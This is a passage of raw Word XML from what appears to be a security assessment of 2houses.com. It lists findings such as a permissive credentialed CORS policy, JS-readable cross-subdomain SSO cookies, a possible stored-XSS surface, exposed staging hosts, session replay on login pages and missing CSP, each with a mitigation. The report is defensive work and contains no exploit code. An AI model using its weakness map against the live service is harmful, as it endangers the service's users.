          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com/api/v1/complete_authentication.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and likely every sibling endpoint) responds to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin: &lt;echoed-Origin&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Credentials: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Any malicious origin can make cookie-authenticated cross-origin requests to the auth API. Combined with the cross-subdomain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie (F-001), no XSS is needed to attack a logged-in user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>rack-cors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an allowlist of exactly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>https://www.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>https://my.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>https://tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F-001 — Plaintext user context cookies, no HttpOnly, cross-subdomain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_user_email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_family_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are all JS-readable via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Three of them scope to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>domain=2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which means a compromised script anywhere on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>*.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (blog, staging, marketing) can exfiltrate the SSO token. 1-year expiry on the SSO cookies — stolen tokens have a long useful life.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>; scope cookies to the narrowest host; rotate SSO tokens server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F-006 — HTML in JSON on `tools.2houses.com/agenda/events.json` — stored-XSS surface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The calendar event API returns server-rendered HTML in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>popoverContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fields, to be injected into the client via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If user input (event title, location, recurrence) isn't HTML-escaped at the point of this template rendering, stored XSS by the other parent becomes possible. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Not tested</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it would require creating an event — against engagement rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Return structured data from the API; render HTML client-side with proper escaping. Audit all sites where user input flows into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>popoverContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F-002 — Staging environments public on the internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-staging.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AWS Frankfurt) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>landing.staging.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AWS CloudFront) both serve public, unauthenticated responses. Staging environments are a classic attack preview — weaker rate limits, more verbose errors, sometimes with production data or password resets that don't require real email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Put staging behind Cloudflare Access / HTTP Basic / VPN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F-005 — Mouseflow on auth pages + undisclosed sub-processor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full session replay is loaded on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com/en/users/sign_in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/users/password/new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Emails, keystroke timings, and form interactions leak to Mouseflow's servers. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mouseflow is not in the sub-processor disclosure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the privacy policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exclude login/reset pages from Mouseflow or remove it; update DPA; consider EU-hosted alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F-007 — No Content-Security-Policy header anywhere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>None of the Rails hosts set CSP. Without it, stored XSS (F-006) and token exfil (F-001) have no kill switch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>config.content_security_policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a nonce-based </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>script-src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Starter config in the finding file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F-008 — WordPress install behind `www.2houses.com`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>POST /wp-admin/admin-ajax.php?action=sptAjaxRecordConversion&amp;sptID=5169</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is hardcoded into the Rails signup page. Either </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>www.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/wp-admin/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a WordPress backend or there's a parallel WP install. WordPress is a major attack surface that should not be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pin down which backend serves these paths, update it, gate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/wp-admin/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
